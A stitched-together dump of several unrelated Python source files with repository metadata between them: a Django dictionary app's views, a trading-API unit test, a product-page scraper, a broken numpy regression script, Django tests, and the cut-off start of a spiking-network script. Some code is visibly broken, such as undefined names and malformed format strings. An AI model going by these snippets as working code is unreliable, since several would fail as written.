content_type='text/plain') if what == 'relationforeigndelete': print(("DELETE: ", rel)) rel.delete() return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id})) elif what == 'relationforeign_loan': rel.loan = value == 'Yes' rel.save() elif what == 'relationforeign_other_lang': rel.other_lang = value rel.save() elif what == 'relationforeign_other_lang_gloss': rel.other_lang_gloss = value rel.save() else: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain') return HttpResponse(value, content_type='text/plain') def gloss_from_identifier(value): """Given an id of the form idgloss (pk) return the relevant gloss or None if none is found""" # We need another way to add a Relation to a Gloss. One textfield can't serve all the possible ways of adding. # One possible solution is to add two fields, one that serves adding by ID and other with Gloss name or name+id. # However, no one is going to memorize or check for the id numbers and they will probably add with Gloss name only. # Therefore the only useful implementation is to do it with the Gloss name only or with Glossname + id. # TODO: Decide what to do here """ # See if 'value' is an int, should match if the user uses only an 'id' as a search string try: int(value) is_int = True except: is_int = False # If value is already int, try to match the int as IDGloss id. if is_int: try: target = Gloss.objects.get(pk=int(value)) except ObjectDoesNotExist: # If the int doesn't match anything, return return HttpResponseBadRequest(_("Target gloss not found."), content_type='text/plain') return target # If 'value' is not int, then try to catch a string like "CAMEL (10)" else:""" # This regex looks from the Beginning of a string for IDGLOSS and then the id # For example: "CAMEL (10)", idgloss="CAMEL" and pk=10 match = re.match('(.*) \((\d+)\)', value) if match: # print "MATCH: ", match idgloss = match.group(1) pk = match.group(2) # print "INFO: ", idgloss, pk # Try if target Gloss exists, if not, assign None to target, then it returns None try: target = Gloss.objects.get(pk=int(pk)) except ObjectDoesNotExist: target = None # print "TARGET: ", target return target # If regex doesn't match, return None else: return None def add_relation(request): """Add a new relation instance""" if request.method == "POST": form = RelationForm(request.POST) if form.is_valid(): role = form.cleaned_data['role'] sourceid = form.cleaned_data['sourceid'] targetid = form.cleaned_data['targetid'] try: source = Gloss.objects.get(pk=int(sourceid)) except Gloss.DoesNotExist: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Source gloss not found."), content_type='text/plain') target = gloss_from_identifier(targetid) if target: rel = Relation(source=source, target=target, role=role) rel.save() return HttpResponseRedirect( reverse('dictionary:admin_gloss_view', kwargs={'pk': source.id}) + '?editrel') else: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Target gloss not found."), content_type='text/plain') else: print(form) # fallback to redirecting to the requesting page return HttpResponseRedirect('/') def add_relationtoforeignsign(request): """Add a new relationtoforeignsign instance""" if request.method == "POST": form = RelationToForeignSignForm(request.POST) if form.is_valid(): sourceid = form.cleaned_data['sourceid'] loan = form.cleaned_data['loan'] other_lang = form.cleaned_data['other_lang'] other_lang_gloss = form.cleaned_data['other_lang_gloss'] try: gloss = Gloss.objects.get(pk=int(sourceid)) except Gloss.DoesNotExist: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Source gloss not found."), content_type='text/plain') rel = RelationToForeignSign(gloss=gloss, loan=loan, other_lang=other_lang, other_lang_gloss=other_lang_gloss) rel.save() return HttpResponseRedirect( reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}) + '?editrelforeign') else: print(form) # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Form not valid"), content_type='text/plain') # fallback to redirecting to the requesting page return HttpResponseRedirect('/') def add_morphology_definition(request): if request.method == "POST": form = MorphologyForm(request.POST) if form.is_valid(): parent_gloss = form.cleaned_data['parent_gloss_id'] role = form.cleaned_data['role'] morpheme_id = form.cleaned_data['morpheme_id'] morpheme = gloss_from_identifier(morpheme_id) thisgloss = get_object_or_404(Gloss, pk=parent_gloss) # create definition, default to not published morphdef = MorphologyDefinition( parent_gloss=thisgloss, role=role, morpheme=morpheme) morphdef.save() return HttpResponseRedirect( reverse('dictionary:admin_gloss_view', kwargs={'pk': thisgloss.id}) + '?editmorphdef') # Translators: Htt404 raise Http404(_('Incorrect request')) def update_morphology_definition(gloss, field, value): """Update one of the relations for this gloss""" (what, morph_def_id) = field.split('_') what = what.replace('-', '_') try: morph_def = MorphologyDefinition.objects.get(id=morph_def_id) except MorphologyDefinition.DoesNotExist: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Bad Morphology Definition ID"), morph_def_id, content_type='text/plain') if not morph_def.parent_gloss == gloss: # Translators: HttpResponseBadRequest return HttpResponseBadRequest(_("Morphology Definition doesn't match gloss"), content_type='text/plain') if what == 'morphology_definition_delete': print(("DELETE: ", morph_def)) morph_def.delete() return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id})) elif what == 'morphology_definition_role': # morph_def.role = value morph_def.role = FieldChoice.objects.get(machine_value=value) morph_def.save() # newvalue = morph_def.get_role_display() newvalue = morph_def.role.english_name elif what == 'morphology_definition_morpheme': morpheme = gloss_from_identifier(value) if morpheme: morph_def.morpheme = morpheme morph_def.save() newvalue = str(morpheme) else: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Badly formed gloss identifier"), value, content_type='text/plain') else: # Translators: HttpResponseBadRequest return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain') return HttpResponse(newvalue, content_type='text/plain') @permission_required('dictionary.change_gloss') def add_tag(request, glossid): """View to add a tag to a gloss""" # default response response = HttpResponse('invalid', content_type='text/plain') if request.method == "POST": gloss = get_object_or_404(Gloss, id=glossid) if 'view_dataset' not in get_perms(request.user, gloss.dataset): # If user has no permissions to dataset, raise PermissionDenied to show 403 template. msg = _("You do not have permissions to add tags to glosses of this lexicon.") messages.error(request, msg) raise PermissionDenied(msg) form = TagDeleteForm(request.POST) if form.is_valid(): if form.cleaned_data['delete']: tag = form.cleaned_data['tag'] # get the relevant TaggedItem ti = get_object_or_404( TaggedItem, object_id=gloss.id, tag__name=tag, content_type=ContentType.objects.get_for_model(Gloss)) ti.delete() response = HttpResponse( 'deleted', content_type='text/plain') return response form = TagUpdateForm(request.POST) if form.is_valid(): tag = form.cleaned_data['tag'] # we need to wrap the tag name in quotes since it might contain spaces Tag.objects.add_tag(gloss, '"%s"' % tag) # response is new HTML for the tag list and form response = render(request, 'dictionary/glosstags.html', {'gloss': gloss, 'tagsaddform': TagsAddForm()}) else: # If we are adding (multiple) tags, this form should validate. form = TagsAddForm(request.POST) if form.is_valid(): tags = form.cleaned_data['tags'] [Tag.objects.add_tag(gloss, str(x)) for x in tags] response = render(request, 'dictionary/glosstags.html', {'gloss': gloss, 'tagsaddform': TagsAddForm()}) return response @login_required @permission_required('dictionary.import_csv') def import_gloss_csv(request): """ Check which objects exist and which not. Then show the user a list of glosses that will be added if user confirms. Store the glosses to be added into sessions. """ glosses_new = [] glosses_exists = [] # Make sure that the session variables are flushed before using this view. if 'dataset_id' in request.session: del request.session['dataset_id'] if 'glosses_new' in request.session: del request.session['glosses_new'] if request.method == 'POST': form = CSVUploadForm(request.POST, request.FILES) if form.is_valid(): dataset = form.cleaned_data['dataset'] if 'view_dataset' not in get_perms(request.user, dataset): # If user has no permissions to dataset, raise PermissionDenied to show 403 template. msg = _("You do not have permissions to import glosses to this lexicon.") messages.error(request, msg) raise PermissionDenied(msg) try: glossreader = csv.reader(codecs.iterdecode(form.cleaned_data['file'], 'utf-8'), delimiter=',', quotechar='"') except csv.Error as e: # Can't open file, remove session variables if 'dataset_id' in request.session: del request.session['dataset_id'] if 'glosses_new' in request.session: del request.session['glosses_new'] # Set a message to be shown so that the user knows what is going on. messages.add_message(request, messages.ERROR, _('Cannot open the file:' + str(e))) return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': CSVUploadForm()}, ) else: try: for row in glossreader: if glossreader.line_num == 1: # Skip first line of CSV file. continue try: # Find out if the gloss already exists, if it does add to list of glosses not to be added. gloss = Gloss.objects.get(dataset=dataset, idgloss=row[0]) glosses_exists.append(gloss) except Gloss.DoesNotExist: # If gloss is not already in list, add glossdata to list of glosses to be added as a tuple. if not any(row[0] in s for s in glosses_new): glosses_new.append(tuple(row)) except IndexError: # If row[0] does not exist, continue to next iteration of loop. continue except UnicodeDecodeError as e: # File is not UTF-8 encoded. messages.add_message(request, messages.ERROR, _('File must be UTF-8 encoded!')) return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': CSVUploadForm()}, ) # Store dataset's id and the list of glosses to be added in session. request.session['dataset_id'] = dataset.id request.session['glosses_new'] = glosses_new return render(request, "dictionary/import_gloss_csv_confirmation.html", {#'import_csv_form': CSVUploadForm(), 'glosses_new': glosses_new, 'glosses_exists': glosses_exists, 'dataset': dataset,}) else: # If form is not valid, set a error message and return to the original form. messages.add_message(request, messages.ERROR, _('The provided CSV-file does not meet the requirements ' 'or there is some other problem.')) return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': form}, ) else: # If request type is not POST, return to the original form. csv_form = CSVUploadForm() allowed_datasets = get_objects_for_user(request.user, 'dictionary.view_dataset') # Make sure we only list datasets the user has permissions to. csv_form.fields["dataset"].queryset = csv_form.fields["dataset"].queryset.filter( id__in=[x.id for x in allowed_datasets]) return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': csv_form}, ) @login_required @permission_required('dictionary.import_csv') def confirm_import_gloss_csv(request): """This view adds the data to database if the user confirms the action""" if request.method == 'POST': if 'cancel' in request.POST: # If user cancels adding data, flush session variables if 'dataset_id' in request.session: del request.session['dataset_id'] if 'glosses_new' in request.session: del request.session['glosses_new'] # Set a message to be shown so that the user knows what is going on. messages.add_message(request, messages.WARNING, _('Cancelled adding CSV data.')) return HttpResponseRedirect(reverse('dictionary:import_gloss_csv')) elif 'confirm' in request.POST: glosses_added = [] dataset = None if 'glosses_new' and 'dataset_id' in request.session: dataset = Dataset.objects.get(id=request.session['dataset_id']) for gloss in request.session['glosses_new']: # If the Gloss does not already exist, continue adding. if not Gloss.objects.filter(dataset=dataset, idgloss=gloss[0]).exists(): try: new_gloss = Gloss(dataset=dataset, idgloss=gloss[0], idgloss_en=gloss[1], created_by=request.user, updated_by=request.user) except IndexError: # If we get IndexError, idgloss_en was probably not provided new_gloss = Gloss(dataset=dataset, idgloss=gloss[0], created_by=request.user, updated_by=request.user) new_gloss.save() glosses_added.append((new_gloss.idgloss, new_gloss.idgloss_en)) # Flush request.session['glosses_new'] and request.session['dataset'] del request.session['glosses_new'] del request.session['dataset_id'] # Set a message to be shown so that the user knows what is going on. messages.add_message(request, messages.SUCCESS, _('Glosses were added succesfully.')) return render(request, "dictionary/import_gloss_csv_confirmation.html", {'glosses_added': glosses_added, 'dataset': dataset.name}) else: return HttpResponseRedirect(reverse('dictionary:import_gloss_csv')) else: # If request method is not POST, redirect to the import form return HttpResponseRedirect(reverse('dictionary:import_gloss_csv')) def gloss_relation(request): """Processes Gloss Relations""" if request.method == "POST": form = GlossRelationForm(request.POST) if "delete" in form.data: glossrelation = get_object_or_404(GlossRelation, id=int(form.data["delete"])) if 'view_dataset' not in get_perms(request.user, glossrelation.source.dataset): # If user has no permissions to dataset, raise PermissionDenied to show 403 template. msg = _("You do not have permissions to delete relations from glosses of this lexicon.") messages.error(request, msg) raise PermissionDenied(msg) ct = ContentType.objects.get_for_model(GlossRelation) # Delete TaggedItems and the GlossRelation TaggedItem.objects.filter(object_id=glossrelation.id, content_type=ct).delete() glossrelation.delete() if "HTTP_REFERER" in request.META: return redirect(request.META["HTTP_REFERER"]) return redirect("/") if form.is_valid(): source = get_object_or_404(Gloss, id=form.cleaned_data["source"]) if 'view_dataset' not in get_perms(request.user, source.dataset): # If user has no permissions to dataset, raise PermissionDenied to show 403 template. msg = _("You do not have permissions to add relations to glosses of this lexicon.") messages.error(request, msg) raise PermissionDenied(msg) target = get_object_or_404(Gloss, id=form.cleaned_data["target"]) glossrelation = GlossRelation.objects.create(source=source, target=target) if form.cleaned_data["tag"]: Tag.objects.add_tag(glossrelation, form.cleaned_data["tag"].name) if "HTTP_REFERER" in request.META: return redirect(request.META["HTTP_REFERER"]) return redirect("/") return HttpResponseBadRequest("Bad request.") return HttpResponseForbidden()
bed9cb10f6453c7018cc7f08aefc7153fb29f8cd
d3efc82dfa61fb82e47c82d52c838b38b076084c
/Autocase_Result/ETFMM_K/YW_ETFMM_SZSJ_408_K.py
1bed5c3ce3bd01583d66e471f4a5c2ac987176e2
[]
no_license
nantongzyg/xtp_test
58ce9f328f62a3ea5904e6ed907a169ef2df9258
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
refs/heads/master
2022-11-30T08:57:45.345460
2020-07-30T01:43:30
2020-07-30T01:43:30
280,388,441
0
0
null
null
null
null
UTF-8
Python
false
false
3,088
py
#!/usr/bin/python # -*- encoding: utf-8 -*- import sys sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api") from xtp_test_case import * sys.path.append("/home/yhl2/workspace/xtp_test/service") from ServiceConfig import * from mainService import * from QueryStkPriceQty import * from log import * sys.path.append("/home/yhl2/workspace/xtp_test/mysql") from CaseParmInsertMysql import * sys.path.append("/home/yhl2/workspace/xtp_test/utils") from QueryOrderErrorMsg import queryOrderErrorMsg class YW_ETFMM_SZSJ_408_K(xtp_test_case): # YW_ETFMM_SZSJ_408_K def test_YW_ETFMM_SZSJ_408_K(self): title = '深圳A股股票交易日五档即成转撤销委托卖-错误的业务类型' # 定义当前测试用例的期待值 # 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单 # xtp_ID和cancel_xtpID默认为0,不需要变动 case_goal = { '期望状态': '废单', 'errorID': 11000370, 'errorMSG': queryOrderErrorMsg(11000370), '是否生成报单': '否', '是否是撤废': '否', 'xtp_ID': 0, 'cancel_xtpID': 0, } logger.warning(title) # 定义委托参数信息------------------------------------------ # 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api stkparm = QueryStkPriceQty('999999', '2', '14', '2', '0', 'S', case_goal['期望状态'], Api) # 如果下单参数获取失败,则用例失败 if stkparm['返回结果'] is False: rs = { '用例测试结果': stkparm['返回结果'], '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'], } self.assertEqual(rs['用例测试结果'], True) else: wt_reqs = { 'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_IPOS'], 'order_client_id':2, 'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'], 'ticker': stkparm['证券代码'], 'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'], 'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_CANCEL'], 'price': stkparm['随机中间价'], 'quantity': 200, 'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT'] } ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type']) CaseParmInsertMysql(case_goal, wt_reqs) rs = serviceTest(Api, case_goal, wt_reqs) logger.warning('执行结果为' + str(rs['用例测试结果']) + ',' + str(rs['用例错误源']) + ',' + str(rs['用例错误原因'])) self.assertEqual(rs['用例测试结果'], True) # 0 if __name__ == '__main__': unittest.main()
9c1513fc38a50fa093602c41444c8be32727345d
f47fe8a7d8cd87b3bfa2e172b4a9fc93e3a4abc2
/2015/AST1/vezbovni/David/habl.py
1b759c2b4f14d8433cbff56e9e18ac1feecb3585
[]
no_license
ispastlibrary/Titan
a4a7e4bb56544d28b884a336db488488e81402e0
f60e5c6dc43876415b36ad76ab0322a1f709b14d
refs/heads/master
2021-01-17T19:23:32.839966
2016-06-03T13:47:44
2016-06-03T13:47:44
60,350,752
0
0
null
null
null
null
UTF-8
Python
false
false
298
py
import numpy as np #import matplot.pyplot as plt d, V, wi, deltav = np.loadtxt(habl.txt, unpac=True) sum_wi = np.sum(wi) sum_wy = np.sum() sum_wx = np.sum() sum_wxy = np.sum(wi*d*V) sum_wx2 = no.sum(wi*d*d) b = (sum_wxy * sum_wi -sum_wy * sum_wx) / (sum_wi * sum_wx2 - (sum_wx)**2) print(b)
f31dc60f9d3b228389bf28bd150e6776ddfe7cc1
c2be187155aabf59a4c0d3f5065bc26239c0b827
/special_crawler/extract_statelinetack_data.py
309d78b9da4250c853051dd1e955893f8a217962
[]
no_license
dankCodeNugs/tmtext
1d6c54f79399bfa5e6f3905c0f72ba0be59d8d0d
8e2d834775f440def7f57294674b8109b46ee191
refs/heads/master
2023-03-16T08:49:38.456929
2016-12-20T19:45:54
2016-12-20T19:45:54
null
0
0
null
null
null
null
UTF-8
Python
false
false
13,954
py
#!/usr/bin/python import urllib import re import sys import json from lxml import html, etree import time import requests from extract_data import Scraper class StateLineTackScraper(Scraper): ''' NOTES : no_image examples: http://www.statelinetack.com/item/horseware-pony-liner-200g/E012435/ ''' ########################################## ############### PREP ########################################## # holds a data from an external request for loading bazaar = None INVALID_URL_MESSAGE = "Expected URL format is http://www.statelinetack.com/item/<product-name>/<product-id>/" def check_url_format(self): """Checks product URL format for this scraper instance is valid. Returns: True if valid, False otherwise """ #m = re.match("^http://www.amazon.com/dp/[a-zA-Z0-9]+$", self.product_page_url) m = re.match(r"^http://www.statelinetack.com/.*?$", self.product_page_url) return not not m ########################################## ############### CONTAINER : NONE ########################################## def _url(self): return self.product_page_url def _event(self): return None def _product_id(self): product_id = self.tree_html.xpath('//input[@id="ctl00_ctl00_CenterContentArea_MainContent_HidBaseNo"]/@value')[0] return product_id def _site_id(self): return None def _status(self): return "success" ########################################## ############### CONTAINER : PRODUCT_INFO ########################################## def _product_name(self): a = self.tree_html.xpath('//*[@itemprop="name"]/text()')[0] if a is not None and len(a)>3: return a return self._product_title() def _product_title(self): return self.tree_html.xpath("//meta[@property='og:title']/@content")[0] def _title_seo(self): return self.tree_html.xpath("//title//text()")[0].strip() def _model(self): return None def _upc(self): return None def _features(self): desc, feat = self._feature_helper() return feat def _feature_count(self): desc, feat = self._feature_helper() return len(feat) def _feature_helper(self): tree = self.tree_html tree = str(etree.tostring(tree)) print re.findall(r'\s*<strong>\s*(.*)\s*</strong>\s*', tree)# take care of some crazy spacing issues tree = re.sub(r'\s*<strong>\s*(.*)\s*</strong>\s*', r'\1', tree) tree = re.sub(r'\n', '', tree) tree = html.fromstring(tree) full_description = [x.strip() for x in tree.xpath('//div[@id="ItemPageProductSummaryBoxMain"]//div[@class="GreyBoxMiddle"]//text()') if len(x.strip())>0] full_description = [x for x in full_description if len(x)>3] feat_index = [i for i in range(len(full_description)) if re.findall(r'^.{0,10}(F|f)eatures.{0,4}$', full_description[i])] spec_index = [i for i in range(len(full_description)) if re.findall(r'^.{0,10}(S|s)pecifications.{0,4}$', full_description[i])] if len(feat_index)>0: feat_index = feat_index[0] else: feat_index = 0 if len(spec_index)>0: spec_index = spec_index[0] else: spec_index = None if spec_index>0: feat = full_description[feat_index+1:spec_index] else: feat = full_description[feat_index+1:] if feat_index>0: desc = full_description[0:feat_index] else: desc = full_description[0] if isinstance(desc, str) or isinstance(desc, unicode): temp = [] temp.append(desc) desc = temp return desc, feat def _model_meta(self): return None def _description(self): # description = ([x.strip() for x in self.tree_html.xpath('//div[@id="ItemPageProductSummaryBoxMain"]//div[@class="GreyBoxMiddle"]//text()') if len(x.strip())>0]) # for row in range(0,6): # if len(description[row]) > 3:#to avoid the heading "product description" # return description[row] # return None desc, feat = self._feature_helper() return ' '.join(desc) def _long_description(self): return None ########################################## ############### CONTAINER : PAGE_ATTRIBUTES ########################################## def _no_image(self): return None def _mobile_image_same(self): return None def _image_urls(self): #metaimg comes from meta tag #metaimg = self.tree_html.xpath('//meta[@property="og:image"]/@content') #imgurl comes from the carousel imageurl = self.tree_html.xpath('//img[@class="swatch"]/@src') if(len(imageurl) == 0): imageurl = self.tree_html.xpath('//meta[@property="og:image"]/@content') return imageurl def _image_count(self): imgurls = self._image_urls() return len(imgurls) def _video_urls(self): #"url":"http://ecx.images-amazon.com/images/I/B1d2rrt0oJS.mp4" video_url = self.tree_html.xpath('//script[@type="text/javascript"]') temp = [] for v in video_url: r = re.findall("[\'\"]url[\'\"]:[\'\"](http://.+?\.mp4)[\'\"]", str(v.xpath('.//text()'))) if r: temp.extend(r) return temp def _video_count(self): return len(self._video_urls()) def _pdf_urls(self): moreinfo = self.tree_html.xpath('//div[@class="ItemPageDownloadableResources"]//div//a/@href') pdfurl = [] print '\n\n' for a in moreinfo: p = re.findall(r'(.*\.pdf)', a) pdfurl.extend(p) baseurl = 'http://www.statelinetack.com/' pdfurl = [baseurl + x[1:] for x in pdfurl] return pdfurl def _pdf_count(self): return len(self._pdf_urls()) def _webcollage(self): return None def _htags_from_tree(self): htags_dict = {} # add h1 tags text to the list corresponding to the "h1" key in the dict htags_dict["h1"] = map(lambda t: self._clean_text(t), self.tree_html.xpath("//h1//text()[normalize-space()!='']")) # add h2 tags text to the list corresponding to the "h2" key in the dict htags_dict["h2"] = map(lambda t: self._clean_text(t), self.tree_html.xpath("//h2//text()[normalize-space()!='']")) return htags_dict def _keywords(self): return None ########################################## ############### CONTAINER : REVIEWS ########################################## #bazaar for ratings def get_bazaar(self): if self.bazaar != None: return self.bazaar else: url = 'http://tabcomstatelinetack.ugc.bazaarvoice.com/3421-en_us/%s/reviews.djs?format=embeddedhtml' url = url % (self._product_id()) contents = urllib.urlopen(url).read() # tree = re.findall(r'var materials=(\{.*?\}.*\})', contents)[0] # tree = re.sub(r'\\(.)', r'\1', tree) # tree = re.findall(r'(\<.*\>)', tree)[0] # tree = html.fromstring(contents) return contents #extract average review, and total reviews def _average_review(self): bazaar = self.get_bazaar() # avg = bazaar.xpath('//*[contains(@class, "BVRRRatingNumber")]//text()') # avg = re.findall(r'<span class=\\"BVRRNumber BVRRRatingRangeNumber\\">(.*?)<\\/span>', bazaar) avg = re.findall(r'<span class=\\"BVRRNumber BVRRRatingNumber\\">([0-9.]*?)<\\/span>', bazaar) return avg[0] def _review_count(self): bazaar = self.get_bazaar() # num = bazaar.xpath('//*[contains(@class, "BVRRRatingRangeNumber")]//text()') num = re.findall(r'\<span class\=\\"BVRRNumber\\"\>([0-9]*?)\<\\/span\> review', bazaar) return num[0] def _max_review(self): return None def _min_review(self): return None ########################################## ############### CONTAINER : SELLERS ########################################## def _price(self): price = self.tree_html.xpath("//span[@id='lowPrice']//text()") if price: return price[0].strip() return None def _in_stores_only(self): return None def _in_stores(self): return None def _owned(self): return 1 def _owned_out_of_stock(self): return None def _marketplace(self): return 0 def _marketplace_sellers(self): return None def _marketplace_lowest_price(self): return None ########################################## ############### CONTAINER : SELLERS ########################################## def _category_name(self): all = self._categories() all = map(lambda t: self._clean_text(t), all) return all[-1] def _categories(self): all = self.tree_html.xpath('//div[@id="ItemPageBreadCrumb"]//a/text()') return all def _brand(self): return None ######################################### ################ HELPER FUNCTIONS ########################################## # clean text inside html tags - remove html entities, trim spaces def _clean_text(self, text): return re.sub("&nbsp;", " ", text).strip() ########################################## ################ RETURN TYPES ########################################## # dictionaries mapping type of info to be extracted to the method that does it # also used to define types of data that can be requested to the REST service DATA_TYPES = { \ # CONTAINER : NONE "url" : _url, \ "event" : _event, \ "product_id" : _product_id, \ "site_id" : _site_id, \ "status" : _status, \ # CONTAINER : PRODUCT_INFO "product_name" : _product_name, \ "product_title" : _product_title, \ "title_seo" : _title_seo, \ "model" : _model, \ "upc" : _upc,\ "features" : _features, \ "feature_count" : _feature_count, \ "model_meta" : _model_meta, \ "description" : _description, \ "long_description" : _long_description, \ # CONTAINER : PAGE_ATTRIBUTES "image_urls" : _image_urls, \ "image_count" : _image_count, \ "video_urls" : _video_urls, \ "video_count" : _video_count, \ "pdf_urls" : _pdf_urls, \ "pdf_count" : _pdf_count, \ "webcollage" : _webcollage, \ "htags" : _htags_from_tree, \ "keywords" : _keywords, \ # CONTAINER : REVIEWS "average_review" : _average_review, \ "review_count" : _review_count, \ "max_review" : _max_review, \ "min_review" : _min_review, \ # CONTAINER : SELLERS "price" : _price, \ "in_stores_only" : _in_stores_only, \ "in_stores" : _in_stores, \ "owned" : _owned, \ "owned_out_of_stock" : _owned_out_of_stock, \ "marketplace": _marketplace, \ "marketplace_sellers" : _marketplace_sellers, \ "marketplace_lowest_price" : _marketplace_lowest_price, \ # CONTAINER : CLASSIFICATION "categories" : _categories, \ "category_name" : _category_name, \ "brand" : _brand, \ "loaded_in_seconds": None \ } # special data that can't be extracted from the product page # associated methods return already built dictionary containing the data DATA_TYPES_SPECIAL = { \ "mobile_image_same" : _mobile_image_same, \ "no_image" : _no_image,\ } # def _anchors_from_tree(self): # description_node = self.tree_html.xpath('//div[contains(@class, "GreyBoxMiddle")]/div/span/span/span/div[3]')[0] # links = description_node.xpath(".//a") # nr_links = len(links) # links_dicts = [] # for link in links: # links_dicts.append({"href" : link.xpath("@href")[0], "text" : link.xpath("text()")[0]}) # ret = {"quantity" : nr_links, "links" : links_dicts} # return ret # def _seller_meta_from_tree(self): # return self.tree_html.xpath("//meta[@itemprop='brand']/@content")[0] # def _meta_description(self): # return self.tree_html.xpath("//meta[@name='Description']/@content")[0] # def _meta_keywords(self): # return self.tree_html.xpath("//meta[@name='Keywords']/@content")[0] # def main(args): # # check if there is an argument # if len(args) <= 1: # sys.stderr.write("ERROR: No product URL provided.\nUsage:\n\tpython crawler_service.py <amazon_product_url>\n") # sys.exit(1) # product_page_url = args[1] # # check format of page url # if not check_url_format(product_page_url): # sys.stderr.write(INVALID_URL_MESSAGE) # sys.exit(1) # return json.dumps(product_info(sys.argv[1], ["name", "short_desc", "keywords", "price", "load_time", "anchors", "long_desc"]))
b91fb546cbb42329ea80e0be279d6f298648f0d1
848cf2c39afe417272ce96d738266995cb0c9ca1
/jirani/tests.py
4c8d790627ab1c565880f05b726771f4c571271d
[ "MIT" ]
permissive
cliffnyendwe/neighbourhood
462c2d13d966745de6c63675e799e57cf412eca8
77e1a1a082a94fb5a883012a66bf2a4504e6d33b
refs/heads/master
2020-04-14T05:41:39.902621
2019-01-14T08:10:40
2019-01-14T08:10:40
163,369,785
0
0
null
null
null
null
UTF-8
Python
false
false
716
py
from django.test import TestCase # Create your tests here. from django.test import TestCase from django.contrib.auth.models import User from .models import Neighborhood , Profile , Business class TestUser(TestCase): def setUp(self): self.testuser = User(username="user", email="[email protected]") def test_instance(self): self.assertIsInstance(self.testuser, User) def test_save_user(self): self.assertFalse(self.testuser in User.objects.all()) self.testuser.save() self.assertTrue(self.testuser in User.objects.all()) def test_save_profile(self): self.fuser = User(username="fuser", email="[email protected]") self.fuser.save()
[ "cliffnyendwe" ]
cliffnyendwe
022fef7f993959e9795ef0ae1fee032d527a65ef
1ae03694e6826c2c3224647024f66debcebd62dc
/algorithms/python/knmf/hdf5/__init__.py
602275033b55a0483937b09a25904e30334569ba
[ "Apache-2.0" ]
permissive
Joaggi/Robust-kernels-for-robust-location-estimation
5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8
9db62273de90547c982d819dc45e66ac86bfcb58
refs/heads/master
2023-04-17T22:41:01.652426
2022-08-02T23:43:31
2022-08-02T23:43:31
27,465,913
3
1
null
2022-08-02T23:39:44
2014-12-03T02:49:24
MATLAB
UTF-8
Python
false
false
30
py
from h5OnlineReader import *
e70f718b0081ee8c8810ed55397e1910334d55c5
cfd2e1f12208dad79bc4b899e81ce1f7de84e80c
/Brian2_scripts/sim_brian_scratch/sim_brian_Jv/sim_brian_Jv_v1_BO.py
b318d3f325f9ca58e4ad173ccd6f21b9406e0375
[]
no_license
zhouyanasd/DL-NC
334adafdea1dd8c4c08c7efef3abc3b623344f0d
396521096f65b27aa24efb1deda7b215876166b2
refs/heads/master
2023-03-22T04:57:19.790975
2023-03-14T08:57:01
2023-03-14T08:57:01
64,385,964
41
9
null
2023-02-15T17:52:34
2016-07-28T10:22:45
Python
UTF-8
Python
false
false
17,260
py
# ---------------------------------------- # LSM without STDP for Jv test # add neurons to readout layer for multi-classification(one-versus-the-rest) # using softmax(logistic regression) # input layer is changed to 781*1 with encoding method # change the LSM structure according to Maass paper # new calculate flow as Maass_ST # simplify the coding method with only extend the rank # for the BO in parallel run # ---------------------------------------- from brian2 import * from brian2tools import * import scipy as sp from scipy import stats import struct import matplotlib.pyplot as plt import pandas as pd from sklearn.preprocessing import MinMaxScaler from sklearn.metrics import accuracy_score import pickle from bqplot import * import ipywidgets as widgets import warnings import os from multiprocessing import Pool import cma import bayes_opt from functools import partial warnings.filterwarnings("ignore") prefs.codegen.target = "numpy" start_scope() np.random.seed(100) data_path = '../../../Data/Jv/' # ------define general function------------ class Function(): def __init__(self): pass def logistic(self, f): return 1 / (1 + np.exp(-f)) def softmax(self, z): return np.array([(np.exp(i) / np.sum(np.exp(i))) for i in z]) def gamma(self, a, size): return stats.gamma.rvs(a, size=size) class Base(): def update_states(self, type='pandas', *args, **kwargs): for seq, state in enumerate(kwargs): if type == 'pandas': kwargs[state] = kwargs[state].append(pd.DataFrame(args[seq])) elif type == 'numpy': kwargs[state] = self.np_extend(kwargs[state], args[seq], 1) return kwargs def normalization_min_max(self, arr): arr_n = arr for i in range(arr.size): x = float(arr[i] - np.min(arr)) / (np.max(arr) - np.min(arr)) arr_n[i] = x return arr_n def mse(self, y_test, y): return sp.sqrt(sp.mean((y_test - y) ** 2)) def classification(self, thea, data): data_n = self.normalization_min_max(data) data_class = [] for a in data_n: if a >= thea: b = 1 else: b = 0 data_class.append(b) return np.asarray(data_class), data_n def allocate(self, G, X, Y, Z): V = np.zeros((X, Y, Z), [('x', float), ('y', float), ('z', float)]) V['x'], V['y'], V['z'] = np.meshgrid(np.linspace(0, X - 1, X), np.linspace(0, X - 1, X), np.linspace(0, Z - 1, Z)) V = V.reshape(X * Y * Z) np.random.shuffle(V) n = 0 for g in G: for i in range(g.N): g.x[i], g.y[i], g.z[i] = V[n][0], V[n][1], V[n][2] n += 1 return G def w_norm2(self, n_post, 